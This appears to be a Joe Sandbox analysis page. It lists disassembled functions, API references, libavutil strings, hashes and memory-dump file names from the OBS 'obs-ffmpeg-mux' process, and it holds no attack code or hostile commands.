Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
Instruction ID: f46a53b4d0226a3741fda8fb53a49cfb6715db3640ba9c53e24bf2b91c2885b8
Opcode Fuzzy Hash: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
Instruction Fuzzy Hash: 27515A61E0AA9381FE699BDDD9446387795AF84BD0F098439DB4D06B96DF3CE442C300

Function 00007FF8BFB825E8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB826A0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB826BE
__AdjustPointer.LIBCMT ref: 00007FF8BFB826FF
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB8270C
__AdjustPointer.LIBCMT ref: 00007FF8BFB82748
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB8275D
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB827A2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB827A9

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
Instruction ID: e2b19baa4bc2bb157625f640f8093f8e907efe78899ab47e3eb4fd2f138cfa41
Opcode Fuzzy Hash: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
Instruction Fuzzy Hash: 37517C25A0AA5282FE669F9ED5446387394AFD5FD4F098436CF4E06B96DE3CE842C300

Function 00007FF8A7C9BC90 Relevance: 12.1, APIs: 8, Instructions: 89timethreadCOMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32 ref: 00007FF8A7C9BCBD
QueryPerformanceCounter.KERNEL32 ref: 00007FF8A7C9BCD0
GetCurrentThread.KERNEL32 ref: 00007FF8A7C9BD39
GetThreadTimes.KERNEL32 ref: 00007FF8A7C9BD5B
GetCurrentProcess.KERNEL32 ref: 00007FF8A7C9BDA8
GetProcessTimes.KERNEL32 ref: 00007FF8A7C9BDCA
_errno.MSVCRT ref: 00007FF8A7C9BDD4
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A7C9BDF5

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CurrentPerformanceProcessQueryThreadTimeTimes$CounterFileFrequencySystem_errno
String ID:
API String ID: 3786581644-0
Opcode ID: d139243207ebbece3588048b73cc12c1a18ec046571d34b62e2ee2edf8e95ea4
Instruction ID: a5e8637558d42ccb20884043b2367fe39b9ce42fee105fd760f217c89aa57871
Opcode Fuzzy Hash: d139243207ebbece3588048b73cc12c1a18ec046571d34b62e2ee2edf8e95ea4
Instruction Fuzzy Hash: 4D31D3B2B1AA46E2DF948F25E41017E6365EB80BC4F40913ADA8E46B5CEF3CD444DB00

Function 00007FF8A7C11C90 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 85stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C11D24

Strings

bgra, xrefs: 00007FF8A7C11D40
bgr32, xrefs: 00007FF8A7C11CC3
yuv420p, xrefs: 00007FF8A7C11CE5, 00007FF8A7C11D74
rgb32, xrefs: 00007FF8A7C11C9A
rgba, xrefs: 00007FF8A7C11CD3
%s%s, xrefs: 00007FF8A7C11D63

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmp
String ID: %s%s$bgr32$bgra$rgb32$rgba$yuv420p
API String ID: 1004003707-3566121812
Opcode ID: 98d685d57b4154a566717737cbd7b33df6296256410a4f9ae653ec1de5376476
Instruction ID: f6db96d3221d5c43067bd6f3313625da08e78a562cc11caccd3fdb5b97909566
Opcode Fuzzy Hash: 98d685d57b4154a566717737cbd7b33df6296256410a4f9ae653ec1de5376476
Instruction Fuzzy Hash: 5D315E61F1A902B6FF62AF12A9112BD1359EF91BC4F880132DE0E57790FE6CE605E300

Function 00007FF8A7BE6810 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226COMMON

Download Yara Rule

Strings

src/libavutil/avstring.c, xrefs: 00007FF8A7BE69F6
tail_len <= 5, xrefs: 00007FF8A7BE69FD
Assertion %s failed at %s:%d, xrefs: 00007FF8A7BE6A0D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: Assertion %s failed at %s:%d$src/libavutil/avstring.c$tail_len <= 5
API String ID: 0-789252298
Opcode ID: 329d394584cb3486badaf9e4265f6a7098fb55d9a784c86af4291aec6c9427e0
Instruction ID: 80ff2be292bfcd580b80c940d729d840101f7d554e5d8327bad5125fa91df1e2
Opcode Fuzzy Hash: 329d394584cb3486badaf9e4265f6a7098fb55d9a784c86af4291aec6c9427e0
Instruction Fuzzy Hash: F87102B3E0F64261EB668E24652477D2591FF057E8F489232EE6E067C4FD7DA842E300

Function 00007FF8A7BFAF20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

src/libavutil/hwcontext.c, xrefs: 00007FF8A7BFB115
orig_dst_frames == ((void *)0) || orig_dst_frames == dst->hw_frames_ctx, xrefs: 00007FF8A7BFB11C
Assertion %s failed at %s:%d, xrefs: 00007FF8A7BFB12C
Failed to map frame into derived frame context: %d., xrefs: 00007FF8A7BFB1DD
Invalid mapping found when attempting unmap., xrefs: 00007FF8A7BFB0F6

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: Assertion %s failed at %s:%d$Failed to map frame into derived frame context: %d.$Invalid mapping found when attempting unmap.$orig_dst_frames == ((void *)0) || orig_dst_frames == dst->hw_frames_ctx$src/libavutil/hwcontext.c
API String ID: 0-1886799933
Opcode ID: 7de98eef6f36daff8acd38367cc58669d168e51f435deb3ddf0eda039419a1c9
Instruction ID: ceca00b02389227dc0e01c8879d61ead28d67a4a6eb17d0c675d4f2d46e8f88a
Opcode Fuzzy Hash: 7de98eef6f36daff8acd38367cc58669d168e51f435deb3ddf0eda039419a1c9
Instruction Fuzzy Hash: 9471A0B2A0AB46E1EB508F26D454A6F67A0FB44FD4F444136DE9D873A0EE78E442E740

Function 00007FF8A7C05342 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C04F79
strcpy.MSVCRT ref: 00007FF8A7C04FC5
strlen.MSVCRT ref: 00007FF8A7C052C6

Strings

verbose, xrefs: 00007FF8A7C05342
?, xrefs: 00007FF8A7C050A8
Last message repeated %d times, xrefs: 00007FF8A7C04FA2
[%s] , xrefs: 00007FF8A7C05316
%s%s%s%s, xrefs: 00007FF8A7C04F2A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmpstrcpystrlen
String ID: Last message repeated %d times$%s%s%s%s$?$[%s] $verbose
API String ID: 895318938-125437466
Opcode ID: 111cff4ae6d6aba25a1bf3a452fafae3e172758b0fbde44d0ea9f4480844efc2
Instruction ID: 9aedf86e9a172545055424a5b42c5e5820effb12d0018397c5925bdb585d2f48
Opcode Fuzzy Hash: 111cff4ae6d6aba25a1bf3a452fafae3e172758b0fbde44d0ea9f4480844efc2
Instruction Fuzzy Hash: 8B61A261D0E68A66EB609F11B4107FE67A2FF867C4F804036DA8D17286DE3DE546E7C0

Function 00007FF8A7C05339 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C04F79
strcpy.MSVCRT ref: 00007FF8A7C04FC5
strlen.MSVCRT ref: 00007FF8A7C052C6

Strings

?, xrefs: 00007FF8A7C050A8
Last message repeated %d times, xrefs: 00007FF8A7C04FA2
fatal, xrefs: 00007FF8A7C05339
[%s] , xrefs: 00007FF8A7C05316
%s%s%s%s, xrefs: 00007FF8A7C04F2A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmpstrcpystrlen
String ID: Last message repeated %d times$%s%s%s%s$?$[%s] $fatal
API String ID: 895318938-1232420508
Opcode ID: e43060acaf70824709399effa99a617178f79ba8015f1816a65e9df156666156
Instruction ID: 182e9a61cf89a89046665f56aae88910393c44c79c52eb20913b0d54e17bd543
Opcode Fuzzy Hash: e43060acaf70824709399effa99a617178f79ba8015f1816a65e9df156666156
Instruction Fuzzy Hash: A461A261D0E68A66EB609F11B4107FE67A1FF867C4F804036DA8D17286DE3DE546E7C0

Function 00007FF8A7C05354 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C04F79
strcpy.MSVCRT ref: 00007FF8A7C04FC5
strlen.MSVCRT ref: 00007FF8A7C052C6

Strings

?, xrefs: 00007FF8A7C050A8
Last message repeated %d times, xrefs: 00007FF8A7C04FA2
[%s] , xrefs: 00007FF8A7C05316
warning, xrefs: 00007FF8A7C05354
%s%s%s%s, xrefs: 00007FF8A7C04F2A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmpstrcpystrlen
String ID: Last message repeated %d times$%s%s%s%s$?$[%s] $warning
API String ID: 895318938-1705345410
Opcode ID: b34cf2a9aa40cf4703508ede8532485c6d2ea4047648aeaf1220a8223c5c525f
Instruction ID: 1c7f4d74c5914f7d1014314f13302ff1dee6cf007df0d05c01e294ee176b8e40
Opcode Fuzzy Hash: b34cf2a9aa40cf4703508ede8532485c6d2ea4047648aeaf1220a8223c5c525f
Instruction Fuzzy Hash: E961A261D0E68A66EB609F11B4107FE67A1FF867C4F804036DA8D17286DE3DE546E7C0

Function 00007FF8A7C0534B Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C04F79
strcpy.MSVCRT ref: 00007FF8A7C04FC5
strlen.MSVCRT ref: 00007FF8A7C052C6

Strings

?, xrefs: 00007FF8A7C050A8
Last message repeated %d times, xrefs: 00007FF8A7C04FA2
[%s] , xrefs: 00007FF8A7C05316
info, xrefs: 00007FF8A7C0534B
%s%s%s%s, xrefs: 00007FF8A7C04F2A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmpstrcpystrlen
String ID: Last message repeated %d times$%s%s%s%s$?$[%s] $info
API String ID: 895318938-3747654419
Opcode ID: 1be4c7bd4cf85f2f8b6acf3c87bb03881b465a4d7c3eb98ae2da582cd249990e
Instruction ID: 60dd8ed6704c296ea7c21f3811cf947e5589373c4391833ba5bf796a0d8342b1
Opcode Fuzzy Hash: 1be4c7bd4cf85f2f8b6acf3c87bb03881b465a4d7c3eb98ae2da582cd249990e
Instruction Fuzzy Hash: C661A261D0E68A66EB609F11B4107FE67A1FF867C4F804036DA8D17286DE3DE546E7C0

Function 00007FF8A7C05366 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C04F79
strcpy.MSVCRT ref: 00007FF8A7C04FC5
strlen.MSVCRT ref: 00007FF8A7C052C6

Strings

debug, xrefs: 00007FF8A7C05366
?, xrefs: 00007FF8A7C050A8
Last message repeated %d times, xrefs: 00007FF8A7C04FA2
[%s] , xrefs: 00007FF8A7C05316
%s%s%s%s, xrefs: 00007FF8A7C04F2A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmpstrcpystrlen
String ID: Last message repeated %d times$%s%s%s%s$?$[%s] $debug
API String ID: 895318938-486550452
Opcode ID: ca6cd3af04bd65ff9df01a8aa6ed36bed15bcb452fe8f5dd11deeb11099c855e
Instruction ID: 28af3d8460ff4a41d5654c2f6d2682aa7877d8ddedeae602a1240feddb8b245d
Opcode Fuzzy Hash: ca6cd3af04bd65ff9df01a8aa6ed36bed15bcb452fe8f5dd11deeb11099c855e
Instruction Fuzzy Hash: 3361A261D0E68A66EB609F11B4107FE67A1FF867C4F804036DA8D17286DE3DE546E7C0

Function 00007FF8A7C0535D Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C04F79
strcpy.MSVCRT ref: 00007FF8A7C04FC5
strlen.MSVCRT ref: 00007FF8A7C052C6

Strings

trace, xrefs: 00007FF8A7C0535D
?, xrefs: 00007FF8A7C050A8
Last message repeated %d times, xrefs: 00007FF8A7C04FA2
[%s] , xrefs: 00007FF8A7C05316
%s%s%s%s, xrefs: 00007FF8A7C04F2A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmpstrcpystrlen
String ID: Last message repeated %d times$%s%s%s%s$?$[%s] $trace
API String ID: 895318938-1090435506
Opcode ID: 3a7e4ea2ce39469d736bb449845fd121ad088e9476b66ab627605bef7bb8b932
Instruction ID: 3dc496e2f0e1cc6cbd34bf485e16884e7476674c62c124bd45707c210c8d169b
Opcode Fuzzy Hash: 3a7e4ea2ce39469d736bb449845fd121ad088e9476b66ab627605bef7bb8b932
Instruction Fuzzy Hash: 9061A261D0E68A66EB609F11B4107FE67A2FF867C4F804036DA8D17286DE3DE546E7C0

Function 00007FF8A7C05327 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C04F79
strcpy.MSVCRT ref: 00007FF8A7C04FC5
strlen.MSVCRT ref: 00007FF8A7C052C6

Strings

panic, xrefs: 00007FF8A7C05327
?, xrefs: 00007FF8A7C050A8
Last message repeated %d times, xrefs: 00007FF8A7C04FA2
[%s] , xrefs: 00007FF8A7C05316
%s%s%s%s, xrefs: 00007FF8A7C04F2A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmpstrcpystrlen
String ID: Last message repeated %d times$%s%s%s%s$?$[%s] $panic
API String ID: 895318938-4009946497
Opcode ID: 0b1fd8db72d8f79bd2880fc2ae61cae8c81ef59cf9502c5cc70fc41dd9ef4533
Instruction ID: 1c1716af7a114a03d0379bd9ceb3e9ce6928aebb6d035e37879985a775bb0668
Opcode Fuzzy Hash: 0b1fd8db72d8f79bd2880fc2ae61cae8c81ef59cf9502c5cc70fc41dd9ef4533
Instruction Fuzzy Hash: 9661A261D0E68A66EB609F11B4107FE67A1FF867C4F804036DA8D17286DE3DE546E7C0

Function 00007FF8A7C05330 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C04F79
strcpy.MSVCRT ref: 00007FF8A7C04FC5
strlen.MSVCRT ref: 00007FF8A7C052C6

Strings

error, xrefs: 00007FF8A7C05330
?, xrefs: 00007FF8A7C050A8
Last message repeated %d times, xrefs: 00007FF8A7C04FA2
[%s] , xrefs: 00007FF8A7C05316
%s%s%s%s, xrefs: 00007FF8A7C04F2A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmpstrcpystrlen
String ID: Last message repeated %d times$%s%s%s%s$?$[%s] $error
API String ID: 895318938-746115170
